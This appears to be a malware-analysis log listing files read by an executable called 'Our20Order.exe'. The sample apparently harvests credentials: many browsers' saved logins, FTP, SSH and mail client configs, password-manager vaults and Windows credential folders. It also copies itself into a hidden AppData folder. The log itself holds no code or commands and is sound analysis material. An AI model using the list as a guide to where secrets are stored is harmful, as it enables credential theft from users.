C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe.config C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\nVM1yrIxsWJcaDGZ\* C:\Users\Seven01\AppData\Local\Temp\Our20Order.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.tmp C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.0.cs C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.dll C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.out C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.err C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.pdb C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Users\Seven01\AppData\Local\Temp\Our20Order.exe.Local\ C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\GAC_64 C:\Windows\assembly\GAC_64\mscorlib.resources C:\Windows\assembly\GAC_32 C:\Windows\assembly\GAC_32\mscorlib.resources C:\Windows\assembly\GAC_MSIL C:\Windows\assembly\GAC_MSIL\mscorlib.resources C:\Windows\assembly\GAC_MSIL\mscorlib.resources\* C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC C:\Windows\assembly\GAC\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_64 C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_32 C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_MSIL C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\* C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll C:\Windows\System32\mscoree.dll.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\System.Management.dll C:\Windows C:\Windows\Microsoft.NET C:\Windows\Microsoft.NET\Framework C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll C:\Users\Seven01\AppData\Local\Temp\System.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll C:\Users\Seven01\AppData\Local\Temp\System.Core.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll C:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp C:\Windows\System32\tzres.dll C:\Program Files\NETGATE\Black Hawk C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE} C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalNichrome\Login Data C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalRockMelt\Login Data C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSpark\Login Data C:\Users\Seven01\AppData\LocalSpark\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalChromium\Login Data C:\Users\Seven01\AppData\LocalChromium\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTitan Browser\Login Data C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTorch\Login Data C:\Users\Seven01\AppData\LocalTorch\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalVivaldi\Login Data C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSuperbird\Login Data C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMustang Browser\Login Data C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalOrbitum\Login Data C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalIridium\Login Data C:\Users\Seven01\AppData\LocalIridium\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db C:\Users\Seven01\AppData\Roaming\Opera C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml C:\Users\Seven01\Documents\SuperPutty C:\Program Files (x86)\FTPShell\ftpshell.fsi C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites C:\Program Files (x86)\FTP Now\sites.xml C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions C:\Program Files (x86)\EasyFTP\data C:\Users\Seven01\AppData\Roaming\SftpNetDrive C:\Program Files (x86)\AbleFTP7\encPwd.jsd C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\encPwd.jsd C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\encPwd.jsd C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\encPwd.jsd C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\encPwd.jsd C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\encPwd.jsd C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\encPwd.jsd C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\encPwd.jsd C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\encPwd.jsd C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\encPwd.jsd C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\encPwd.jsd C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\encPwd.jsd C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\encPwd.jsd C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\encPwd.jsd C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\encPwd.jsd C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\encPwd.jsd C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize7\encPwd.jsd C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize8\encPwd.jsd C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize9\encPwd.jsd C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize10\encPwd.jsd C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize11\encPwd.jsd C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize12\encPwd.jsd C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize13\encPwd.jsd C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize14\encPwd.jsd C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd C:\Users\Seven01\AppData\Roaming\Cyberduck C:\Users\Seven01\AppData\Roaming\iterate_GmbH C:\Users\Seven01\.config\fullsync\profiles.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg C:\Program Files (x86)\FileZilla\Filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Program Files (x86)\Staff-FTP\sites.ini C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat C:\Program Files (x86)\Fastream NETFile\My FTP Links C:\Program Files (x86)\GoFTP\settings\Connections.txt C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat C:\Program Files (x86)\DeluxeFTP\sites.xml C:\Windows\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini C:\Users\Seven01\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini C:\Program Files (x86)\FTPGetter\Profile\servers.xml C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml C:\Program Files (x86)\WS_FTP\WS_FTP.INI C:\Windows\WS_FTP.INI C:\Users\Seven01\AppData\Roaming\Ipswitch C:\Users\Seven01\site.xml C:\Users\Seven01\AppData\Local\PokerStars* C:\Users\Seven01\AppData\Local\ExpanDrive C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt C:\Users\Seven01\AppData\Roaming\FlashFXP C:\ProgramData\FlashFXP C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat C:\ProgramData\NetDrive2\drives.dat C:\Users\Seven01\AppData\Roaming\SmartFTP C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db C:\Users\Seven01\Documents\*.tlp C:\Users\Seven01\Documents\*.bscp C:\Users\Seven01\Documents\*.vnc C:\Users\Seven01\Desktop\*.vnc C:\Users\Seven01\Documents\mSecure C:\ProgramData\Syncovery C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP C:\Program Files (x86)\Foxmail\mail C:\Foxmail* C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini C:\Users\Seven01\Documents\Pocomail\accounts.ini C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail C:\Program Files (x86)\WinFtp Client\Favorites.dat C:\Windows\32BitFtp.TMP C:\Windows\32BitFtp.ini C:\FTP Navigator\Ftplist.txt C:\Softwarenetz\Mailing\Daten\mailing.vdt C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat C:\Users\Seven01\Documents\*Mailbox.ini C:\Users\Seven01\Documents\yMail2\POP3.xml C:\Users\Seven01\Documents\yMail2\SMTP.xml C:\Users\Seven01\Documents\yMail2\Accounts.xml C:\Users\Seven01\Documents\yMail\ymail.ini C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config C:\Users\Seven01\Documents\*.spn C:\Users\Seven01\Desktop\*.spn C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db C:\Users\Seven01\AppData\Roaming\stickies\images C:\Users\Seven01\AppData\Roaming\stickies\rtf C:\Users\Seven01\AppData\Roaming\NoteFly\notes C:\Users\Seven01\AppData\Roaming\Conceptworld\Notezilla\Notes8.db C:\Users\Seven01\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt C:\Users\Seven01\Documents C:\Users\Seven01\Documents\*.kdbx C:\Users\Seven01\Desktop C:\Users\Seven01\Desktop\*.kdbx C:\Users\Seven01\Documents\*.kdb C:\Users\Seven01\Desktop\*.kdb C:\Users\Seven01\Documents\Enpass C:\Users\Seven01\Documents\My RoboForm Data C:\Users\Seven01\Documents\1Password C:\Users\Seven01\AppData\Local\Temp\Mikrotik\Winbox C:\Windows\Microsoft.NET\Framework\v2.0.50727\NETAPI32.DLL C:\Windows\System32\netapi32.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\netutils.dll C:\Windows\System32\netutils.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\srvcli.dll C:\Windows\System32\srvcli.dll C:\Users\Seven01\AppData\Roaming\E62877 C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.lck C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials C:\Users\Seven01\AppData\Roaming\Microsoft\Credentials\* C:\Users\Seven01\AppData\Local\Microsoft\Credentials C:\Users\Seven01\AppData\Local\Microsoft\Credentials\* C:\Users\Seven01\AppData\Roaming\E62877\73E4A9.exe C:\Windows\Temp
Read Files
